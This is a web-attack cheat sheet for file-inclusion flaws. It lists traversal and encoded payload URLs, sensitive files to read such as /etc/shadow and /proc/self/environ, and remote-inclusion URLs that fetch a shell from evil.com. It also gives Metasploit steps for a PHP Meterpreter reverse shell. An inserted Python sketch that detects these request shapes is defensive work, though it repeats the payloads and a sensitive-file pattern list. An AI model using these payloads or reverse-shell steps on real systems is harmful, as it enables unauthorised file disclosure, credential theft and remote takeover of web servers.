
LFI/RFI - Cheat Sheet

Payloads

Basic LFI

http://example.com/index.php?page=etc/passwd
http://example.com/index.php?page=etc/passwd%00
http://example.com/index.php?page=../../etc/passwd
http://example.com/index.php?page=%252e%252e%252f
http://example.com/index.php?page=....//....//etc/passwd

Interesting Files

/etc/issue
/etc/passwd
/etc/shadow
/etc/group
/etc/hosts
/etc/motd
/etc/mysql/my.cnf
/proc/[0-9]*/fd/[0-9]*   (first number is the PID, second is the file descriptor)
/proc/self/environ
/proc/version
/proc/cmdline

Basic RFI

http://example.com/index.php?page=http://evil.com/shell.txt
http://example.com/index.php?page=http://evil.com/shell.txt%00
http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt
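Detection sketch for the Basic LFI and Basic RFI request shapes listed above (an added example, not part of the original cheat sheet). It decodes the parameter until it stops changing, so the %252e and %252f forms are unwrapped before matching. The parameter name page is taken from the URLs above; the finding names and the decode-depth limit are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Targets from the "Interesting Files" list on this page.
SENSITIVE = re.compile(
    r"(?:^|/)(?:etc/(?:issue|passwd|shadow|group|hosts|motd|mysql/my\.cnf)"
    r"|proc/(?:self/environ|version|cmdline|\d+/fd/\d+))"
)
TRAVERSAL = re.compile(r"\.\.[/\\]")                 # also hits ....// variants
REMOTE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.I)  # value is itself a URL
MAX_ROUNDS = 5  # assumption: decode depth limit, enough for %252e-style nesting


def fully_decode(value):
    """Percent-decode repeatedly until the value stops changing."""
    for _ in range(MAX_ROUNDS):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(url, param="page"):
    """Return sorted finding names for the include parameter of one request URL."""
    # parse_qs decodes one layer; fully_decode unwraps any remaining layers.
    values = parse_qs(urlsplit(url).query, keep_blank_values=True).get(param, [])
    findings = set()
    for value in map(fully_decode, values):
        if "\x00" in value:
            findings.add("null-byte")
        if REMOTE.match(value):
            findings.add("remote-scheme")
        if TRAVERSAL.search(value):
            findings.add("traversal")
        if SENSITIVE.search(value):
            findings.add("sensitive-file")
    return sorted(findings)


if __name__ == "__main__":
    base = "http://example.com/index.php?page="
    # Request values from the lists above, plus one constructed benign value.
    for v in ["etc/passwd%00", "%252e%252e%252f", "....//....//etc/passwd",
              "http:%252f%252fevil.com%252fshell.txt", "about"]:
        print(f"{v:45} {classify(base + v)}")
```

A value with no traversal, scheme or known target, such as a plain relative path to an uploaded file, yields no finding, so pattern matching of this kind supplements a server-side allowlist of includable files rather than replacing it.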

LFI To RCE Via Upload

http://example.com/index.php?page=path/to/uploaded/file.png

Metasploit Module

use exploit/multi/script/web_delivery
set target 1
set lhost <IP>
set srvport <PORT>
set payload php/meterpreter/reverse_tcp
exploit

Metasploit then generates a payload, which you add to the vulnerable parameter.

